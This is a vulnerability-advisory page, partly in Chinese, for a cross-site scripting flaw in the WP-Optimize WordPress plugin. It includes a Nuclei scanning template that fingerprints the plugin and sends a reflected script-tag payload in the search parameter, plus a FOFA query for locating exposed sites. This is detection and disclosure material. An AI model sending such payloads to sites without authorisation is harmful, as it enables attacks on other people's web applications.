CVE-2023-1119: WP-Optimize WordPress plugin < 3.2.13 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WP-Optimize WordPress plugin | POC: 已公开

漏洞描述

The WP-Optimize WordPress plugin before 3.2.13 and SrbTransLatin WordPress plugin before 2.4.1 are vulnerable to cross-site scripting due to a third-party library that improperly handles HTML character escaping.

PoC代码[已公开]

id: CVE-2023-1119

info:
  name: WP-Optimize WordPress plugin < 3.2.13 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The WP-Optimize WordPress plugin before 3.2.13 and SrbTransLatin WordPress plugin before 2.4.1 are vulnerable to cross-site scripting due to a third-party library that improperly handles HTML character escaping.
  remediation: Users are recommended to upgrade WP-Optimize to version 3.2.13 and SrbTransLatin to version 2.4.1 to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/1119
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1119
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-1119
    cwe-id: CWE-79
    epss-score: 0.21072
    epss-percentile: 0.95457
    cpe: cpe:2.3:a:wp-optimize:wp-optimize:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wordpress
    product: wp-optimize,srbtranslatin
    fofa-query: body="/wp-content/plugins/wp-optimize"
  tags: cve,cve2023,wp,wp-plugin,wordpress,wp-optimize,xss

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "/wp-content/plugins/wp-optimize"
        internal: true

  - raw:
      - |
        GET /?s=<%2Fscript><script>alert%28document.domain%29<%2Fscript> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"
          - "Search"
        condition: and

      - type: word
        part: body
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c712608e948927043a1fac4ca5e334c47825a8e905c0649e23a4e24674b5672602206c48297967c63f0c0a90945d7e10bf64b0585d1baad6df33a1ba67d1ff668772:922c64590222798bb761d5b6d8e72950

相关漏洞推荐